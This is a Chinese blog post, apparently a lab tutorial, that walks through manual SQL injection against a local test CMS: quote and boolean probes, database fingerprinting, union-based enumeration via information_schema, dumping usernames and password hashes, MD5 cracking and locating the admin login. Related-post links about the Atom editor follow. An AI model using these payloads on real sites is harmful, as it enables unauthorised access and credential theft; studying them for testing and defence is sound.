atom与mysql,MySQL数据库手工注入

于 2021-03-12 19:28:09 发布
阅读量216 收藏
点赞数
文章标签: atom与mysql

1、测试环境:Firefox浏览器,hackbar工具

2、测试站点:http://127.0.0.1/cms/

f10c15e4ba7d4e8d30df063b39a5e242.png

3、注入点:http://127.0.0.1/cms/show.php?id=33

(1)正常访问页面

3418b5fcde378d143f53b153adb6f572.png

(2)输入英文单引号 ‘

a3330ebfa2981bffa6fa54a96179663a.png

从报错显示中知道目标站是MySQL数据库

(3)输入 and 1=1,返回正常

1673df1cfb2a94109eeff4a800819669.png

(4)输入 and 1=2,返回错误

2d9d9f1623a8c074b7e6c54d6e6690b4.png

4、判断数据库类型

根据出错信息可以判断出是MySQL数据库,也可以用命令测试实现

Access:

and (select id from MSysAccessObjects) >0 返回正常说明是access

MSSQL:

and (select id from sysobjects) >0 返回正常说明是mssql

MySQL:

and length(user())>0    返回正常说明是MySQL

1a8d5e55626a1ed1d1d9305904460a86.png

5、爆字段长度

使用命令 order by num,采用二分查找法,迅速找出num的值

1452988b22fce9e560eae81cc83efc82.png

e1045d7009fc832633a001989017f083.png

输入15返回正常,输入16返回错误,说明就有15个长度

6、匹配字符,命令 and 1=2 union select 1,2,3,4,,,,,n

然后根据返回数据位置构造下一步需要查询的信息命令

b479225c1bf8f199dead683ae12e802e.png

7、爆数据库、系统等基本信息

在显示数字3和11处输入命令查找信息,常用内置查询函数有

select system_user()  查看系统用户

select current_user()  查询当前用户

select user()  查询用户

SELECT version()  查询数据库版本

SELECT database()  查询当前连接的数据库

select @@version_compile_os 查询当前操作系统

select @@datadir    查询读取数据库路径

select @@basedir    查询MYSQL安装路径

beb95b2d2e654756cccbccc3939caac0.png

8、爆数据库名

select schema_name from information_schema.schemata

3183b354c87d583a35c516d22eb69903.png

9、爆数据表名

select table_name from information_schema.tables where table_schema=0x数据库名

数据库名需要转换成十六进制

40020753c9ff8a9ba37bddd1e902e61a.png

10、爆列

select column_name from information_schema.columns where table_name=0x数据表名

数据表名需要转换成十六进制

6ec383ca8ccc97fd89c597641ec7152b.png

11、爆字段

select 列1,列2,列3… from 数据表名

21a7fb621f1bd9f1ad5bd6df34b3434f.png

12、md5解密

根据找到的用户名和密码去cmd5解密

b76d19ee1aa6314b3ed8f6a1bc5e8b63.png

13、找后台

首先在页面中看有没有现成的后台链接,如果没有,可以尝试输入如 /admin , /manager等常用后台地址,或使用后台扫描工具

58984df714499c88e3c2825c9bcf8715.png

14、登录

c0f70785792f8b8468e2ca5ed1cd839d.png

weixin_39610774
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Atom编辑器入门到精通(四) Atom使用进阶
u010494080的专栏
03-27 3万+
在本节中将介绍Atom提供的更高级的使用技巧,通过这些技巧将会进一步提高你的代码编写效率
atom-style-tweaks:Atom文本编辑器的调整数据库
02-04
原子调整 用于收集有关环境的各种简单调整的。 这是在上运行的网站的源代码。 开发人员文件 可以在上找到开发人员文档。 贡献 请参阅《 。 执照
atom运行mysql_atom下载安装及使用教程
weixin_36168780的博客
01-25 417
Atom编辑器优点是比较均衡, 上手简单, 零门槛, 资源占用不高, 自身支持的功能就挺多, 配置起来也很方便, 还有一大堆插件可以选择, 还开源免费, 而且在对中文的支持上也没什么问题,感兴趣的小伙伴参考一下。下载地址:Windows运行安装包安装Linux如果是基于Debian的发行版, 执行命令:sudo dpkg -i atom-amd64.deb如果是RedHat, 则执行:rpm -i...
atom如何写mysql语言_用atom写LaTeX文档
weixin_35112917的博客
01-26 160
下载并安装Tex Live: 下载页面下载并安装atom:下载页面打开atomFile -> Settings -> Install搜索并安装:language-latexlatexpdf-view新建文件,后缀名为.tex,编码为UTF-8测试:\documentclass[UTF8]{article}\author {Author}\title {Title}\usepackage...
atom mysql插件_强力推荐:Atom入坑必备插件
weixin_29070721的博客
02-01 186
Atom作为Javascript/CSS/HTML等前端编辑器利器,其强大功能依靠各种插件,以下是笔者在入坑阶段,精挑细选总结出的必不可少的插件,熟悉运用这些插件,一定成吨提高生产效率。安装这些插件只需要在Atom的File ->setting ->install中输入插件名称查到后即可安装:1.Sync Settings搭配github,同步你的atom插件信息,配置信息,让你轻松实...
直连数据库
懒散狂徒的专栏
04-04 2651
直连数据库public boolean createConn_Direct(String drv,String url,string usr,String pwd){ try{  if(connAction.equals("GET")){    throw new SQLException("数据库已连接,无须重连!");}  Class.forName(drv).newInstance(); 
atom mysql插件_Atom插件安装及推荐
weixin_28235513的博客
02-06 193
简介(了解更多去google或baidu)Atom代码编辑器支持 Windows、Mac、Linux三大桌面平台,完全免费,并且已经在 GitHub 上开放了全部的源代码。在经过一段长时间的迭代开发和不断改进后,Atom 终于从早期的测试版达到了 1.0 正式版了!相比之前的版本,在性能和稳定性方面都有着显著的改善。开发团队将 Atom 称为一个“为 21 世纪创造的可配置的编辑器”,它拥有非...
atom mysql插件_Atom 有什么优秀插件?
weixin_28811757的博客
02-06 141
装做有人邀请的样子。自从入了Atom的坑,深刻明白了一个道理,一款顺手的文本编辑器,不论是在自己熟悉的领域开发还是学习新的语言,都是重中之重。本人以前只做java开发,在基本掌握Atom使用方法后,已经相继将php,Node.js,React Native等语言纳入技能库,以下是本人的一些插件配置信息,跟各位dalao分享下:1、语言(language)语言插件是Atom中插件系统的绝对核心。目前...
Atom - 介绍和使用方法(好用的文本编辑器,代码提示高亮、Markdown)
热门推荐
源码好优多
01-18 6万+
一,Atom介绍Atom 是 Github 开源的文本编辑器,这个编辑器完全是使用Web技术构建的(基于Node-Webkit)。启动速度快,提供很多常用功能的插件和主题,可以说Atom已经足以胜任“半个IDE”了。个人感觉有如下几个优点:(1)多平台支持(Windows、Mac、Linux)(2)界面美观、现代化,使用舒适(3)多文件管理(Atom提供了文件树列表的功能)(4)设置管理很方便,不
atom简介
回忆的往昔
09-10 2165
1、Atom简介 AtomAtom联合格式(Atom Syndication Format)的简称。它是 一种基于XML的超媒体格式。它提供了灵活可扩展的互操作的格式,并且因为基于XML的特点,所以它为跨平台的应用间传递数据提供了很好的支持。是IETF的“建议标准”。Atom作为一种流行的超媒体格式已经被Google等广泛使用。下图为一Atom格式实例:    3、At
Atom 编辑器基本使用
王慧勇
06-25 5436
常用快捷键 command p fuzzy finder shift command p 命令面板 功能 多点编辑 按住 command,鼠标多处单击 包管理 find result 配置
SQL常用语句一览
atomti
10-15 105
SQL常用语句一览 (1)数据记录筛选: sql="select*from数据表where字段名=字段值orderby字段名[desc]" sql="select*from数据表where字段名like'%字段值%'orderby字段名[desc]" sql="selecttop10*from数据表where字段名orderby字段名[desc]" sql="selec...
使用DataGrip连接SQL Server 2017数据库
weixin_33714884的博客
12-09 1163
微软的SQL Server数据库是做.NET开发的好朋友,现在最新的版本是2017.SQL Server数据库有自己的Management Studio工具,基本用起来和Visual Studio差不多。当然除了官方的工具之外,其他的数据库工具自然也可以连接到SQL Server。这里介绍一下用Jetbrai...
MySQL数据库优化学习笔记--------分析海量数据
atomatom98的博客
10-10 150
首先创建数据库及表 create table dept ( dno int(5) primary key default 0, dname varchar(20) not null default '', loc varchar(30) default '' )engine=innodb default charset=utf8; create table emp ( eid int(5) p...
教你安装Atom编辑器并使用震撼的编辑效果
hnliu's blog
09-08 5079
教你安装Atom编辑器并使用震撼的编辑效果
ATOM基础教程一ATOM配置(10)
zsl10的专栏
07-12 8514
简介ATOM配置是指在file->config.cson文件下进行配置,配置文件是作用于全局的。 ATOM提供了两种配置方式: 打开设置界面配置 直接在config.cson文件下编辑配置项 config.cson文件全局配置项"*": //全局 core ://核心配置 disabledPackages:[ //被禁用的插件名列表 ]
atom 常用插件集合
许盛的博客
08-21 2582
最近两天学习了一下 atom 的使用,感觉完爆 sublime 啊。收录下一些常用的插件,以备查阅:1. minimap可以让 atom 像 sublime 那样,编辑区的右侧出现一个代码的预览界面。2. project-manageralt + shift + p管理工程的插件,有很多功能,可以按快捷键调出菜单后自己看一看3. highlight-selected高亮文件中所有与当前选中部分相同的
atom 基础使用教程
伏虎游侠的博客
09-18 4778
  https://blog.csdn.net/column/details/atom-tutorial.html
数据库原理与应用 数据库技术的产生与发展
AtomQQ_2022313691的博客
03-18 499
数据库技术发展的历史 随着计算机硬件和软件的发展,数据管理技术经历了从低级到高级的发展阶段,即: 人工管理阶段 计算机软、硬件的特点: 计算机主要用于科学计算,硬件中的外存只有卡片、纸袋、磁带,没有磁盘等直接存取设备。 (1)数据不保存 科学计算,数据量少,对于数据保存的需求尚不迫切,只有在计算某一课题时才将原始数据岁程序一起输入内存,计算完成时,数据和程序一起从内存中被释放。 数据由应用程序自...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值